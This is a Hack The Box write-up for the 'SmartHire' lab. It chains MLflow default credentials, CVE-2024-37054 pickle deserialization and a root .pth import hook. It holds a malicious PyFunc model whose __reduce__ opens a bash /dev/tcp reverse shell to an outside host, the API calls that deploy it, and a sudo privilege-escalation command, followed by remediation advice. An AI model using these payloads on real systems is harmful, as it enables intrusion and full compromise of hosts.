$ cat writeup.md / 2026.08.27

HTB SmartHire writeup

Target: 10.129.245.215 · Linux · MLflow default credentials · CVE-2024-37054 unsafe model deserialization · Python .pth sudo escalation

Smarthire chains two dangerous trust failures. The public hiring application uses an MLflow 2.14.1 registry whose administrator still has the default admin:password credential. After creating a normal application account, an attacker can learn the exact registered-model name the application will load, upload a crafted PyFunc artifact through MLflow, and make the prediction endpoint deserialize it. The model launches a shell as svcweb. Locally, svcweb can run a Python management script as root; that script processes a group-writable plugin directory with site.addsitedir(), allowing a .pth import hook to execute as root.

Note: Flag values are intentionally redacted here. Their locations are /home/svcweb/user.txt and /root/root.txt.

Attack path at a glance

  1. Enumerate SSH and nginx on ports 22 and 80.
  2. Identify smarthire.htb and register an application account.
  3. Discover the models.smarthire.htb virtual host.
  4. Log in to MLflow 2.14.1 with admin:password.
  5. Upload a crafted PyFunc model and register it under the current user's expected model name.
  6. Call /predict to trigger unsafe cloudpickle deserialization.
  7. Receive a shell as svcweb and obtain the user flag.
  8. Place a root-executed .pth hook in the writable developer plugin directory.
  9. Invoke the permitted sudo command and obtain a root shell.

Enumeration

ping -c 2 -W 2 10.129.245.215
nmap -Pn -sC -sV --version-all 10.129.245.215
nmap -Pn -p- --min-rate 1000 --max-retries 2 10.129.245.215
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.15
80/tcp open  http    nginx 1.18.0 (Ubuntu)

Port 80 redirected to http://smarthire.htb/. Explicit curl resolution avoided changing the system hosts file:

curl -sSik --resolve smarthire.htb:80:10.129.245.215 \
  http://smarthire.htb/

The Flask-style site exposed registration and login, followed by authenticated model-training and prediction pages. JavaScript referenced /model_info, /upload_hiring_data, and /predict.

Virtual-host fuzzing found a second nginx site:

ffuf -u http://10.129.245.215/ \
  -H 'Host: FUZZ.smarthire.htb' \
  -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt \
  -mc all -ac -t 20 -rate 80

models  [Status: 401, Size: 137]

models.smarthire.htb returned WWW-Authenticate: Basic realm="mlflow". The MLflow default administrator credential was valid:

curl -sS -u admin:password \
  --resolve models.smarthire.htb:80:10.129.245.215 \
  http://models.smarthire.htb/version

2.14.1

The reviewed GitHub advisory for CVE-2024-37054 includes MLflow 2.14.1 in the affected range. The matching 2.14.1 source shows PyFunc models being written with cloudpickle.dump() and loaded with cloudpickle.load().

Account-specific model name

I registered a normal account with company Independent. After login, /model_info disclosed the exact registry name the prediction route expected:

curl -sS --resolve smarthire.htb:80:10.129.245.215 \
  -b researcher27.cookies http://smarthire.htb/model_info

{
  "model_info": null,
  "model_name": "Independent-058f23b4f94d-model",
  "status": "success"
}

Source review after initial access confirmed that the application builds this value as {company}-{user_id}-model, then loads models:/<name>/latest with mlflow.pyfunc.load_model().

Initial access: malicious MLflow PyFunc model

I created a workspace-local MLflow 2.14.1 environment and built a minimal model. Its reduction function starts a callback when python_model.pkl is deserialized. When reproducing, replace the callback address with the current HTB VPN address shown for tun0:

import subprocess
import mlflow.pyfunc

class CallbackModel(mlflow.pyfunc.PythonModel):
    def __reduce__(self):
        command = [
            "/bin/bash", "-c",
            "/bin/bash -i >& /dev/tcp/10.10.14.78/9001 0>&1",
        ]
        return subprocess.Popen, (command,)

    def predict(self, context, model_input):
        return [0]

mlflow.pyfunc.save_model(
    path="callback_model",
    python_model=CallbackModel(),
    pip_requirements=[],
)

Before upload, python -m pickletools callback_model/python_model.pkl showed only the expected subprocess.Popen, Bash arguments, REDUCE, and STOP opcodes.

Using the authenticated MLflow REST API, I created an experiment and run:

POST /api/2.0/mlflow/experiments/create
{"name":"smarthire-security-validation"}

experiment_id = 282863634180378839

POST /api/2.0/mlflow/runs/create
{
  "experiment_id":"282863634180378839",
  "run_name":"validated-pyfunc-model"
}

run_id = 2dad3c3d99f945b48f31bf7cc5c4d9bd

The five model files were uploaded to the run's artifacts/model/ directory through /api/2.0/mlflow-artifacts/artifacts/...:

MLmodel
python_model.pkl
conda.yaml
python_env.yaml
requirements.txt

I then created registered model Independent-058f23b4f94d-model and a version whose source was runs:/2dad3c3d99f945b48f31bf7cc5c4d9bd/model. MLflow reported version 1 as READY.

With a listener on TCP/9001, a valid resume CSV triggered the application to load that model:

experience,skills
60,"Python, Machine Learning, SQL"

curl -sSik --resolve smarthire.htb:80:10.129.245.215 \
  -b researcher27.cookies \
  -X POST http://smarthire.htb/predict \
  -F 'file=@resume.csv;type=text/csv'

The HTTP response was useful corroboration:

HTTP/1.1 500 INTERNAL SERVER ERROR
{"message":"'Popen' object has no attribute 'load_context'","status":"error"}

The callback arrived simultaneously:

svcweb@smarthire:/var/www/smarthire.htb$ id
uid=1000(svcweb) gid=1000(svcweb) groups=1000(svcweb),1001(mlflowweb),1002(devs)

User flag and local findings

The user flag was at /home/svcweb/user.txt.

The application environment independently confirmed the registry credential and exposed its Flask signing key:

MLFLOW_TRACKING_URI=http://127.0.0.1:5000
MLFLOW_TRACKING_USERNAME=admin
MLFLOW_TRACKING_PASSWORD=password
SMARTHIRE_SECRET_KEY=b9c53f2f4459ee6ed15f7f85c0549861

Passwordless sudo was more important:

sudo -n -l

(root) NOPASSWD: /usr/bin/python3.10 /opt/tools/mlflow_ctl/mlflowctl.py *

The management script adds every child of its plugin directory as a Python site directory before importing its action modules:

for path in PLUGINS_DIR.iterdir():
    if path.is_dir():
        site.addsitedir(str(path))

def main():
    import mlflow_actions, backup_models

/opt/tools/mlflow_ctl/plugins/dev was root:devs mode 0775, and svcweb belongs to devs. Python's site.addsitedir() processes .pth files and executes lines beginning with import, turning the writable plugin directory into code execution inside the root interpreter.

Privilege escalation: root-executed .pth hook

I placed a single import line in the developer directory:

printf '%s\n' \
  'import os; os.execl("/bin/bash", "bash", "-p")' \
  > /opt/tools/mlflow_ctl/plugins/dev/99-security-test.pth

Invoking any allowed action made root's Python process the file and replace itself with a privilege-preserving shell:

sudo /usr/bin/python3.10 /opt/tools/mlflow_ctl/mlflowctl.py status

id
uid=0(root) gid=0(root) groups=0(root)

whoami
root

The root flag was at /root/root.txt.

Credentials and secrets

ContextUsername/keySecretImpact
MLflow Basic AuthadminpasswordFull registry, run, and artifact administration
SmartHIRE test accountresearcher27R3searcher_HTB27Authenticated prediction access; created during testing
Flask session signingSMARTHIRE_SECRET_KEYb9c53f2f4459ee6ed15f7f85c0549861Session forgery risk

Remediation

  1. Replace the MLflow default credential, restrict the registry virtual host, and use separate least-privilege identities for operators and the web application.
  2. Upgrade MLflow from 2.14.1 to a currently supported release and monitor upstream security advisories.
  3. Treat pickle, cloudpickle, Joblib, and ML model artifacts as executable code. Never promote or load user-controlled artifacts without provenance validation, signing, sandboxed inspection, and approval.
  4. Separate model publication from production promotion, and enforce ownership through authorization rather than predictable model names.
  5. Rotate the Flask key and registry credentials, then store them outside the web tree in a protected secret store or root-readable service configuration.
  6. Remove the wildcard interpreter sudo rule. Expose only fixed operations through a root-owned wrapper that validates every argument.
  7. Make every root-imported directory root-owned and non-writable. Deploy plugins through a reviewed root-controlled process.
  8. Do not call site.addsitedir() on extension directories because it processes executable .pth content. Load an allowlist of exact, root-owned modules instead.
  9. Run SmartHIRE and MLflow under different unprivileged accounts with restricted egress, read-only filesystems where practical, and container/systemd sandboxing.
  10. Alert on default-account logins, artifact uploads, new model versions, unexpected registry changes, and application-worker outbound connections.